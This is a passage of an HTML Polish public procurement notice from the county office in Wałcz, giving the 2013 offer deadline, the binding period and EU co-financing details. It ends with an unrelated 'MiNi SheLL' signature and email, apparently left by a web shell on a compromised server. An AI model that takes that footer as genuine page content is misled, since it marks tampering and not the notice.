<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2013 godzina 10:00, miejsce: Biuro Obsługi Interesanta, Starostwo Powiatowe w Wałczu, ul. Dąbrowskiego 17, 78 - 600 Wałcz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt będzie dofinansowany z Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com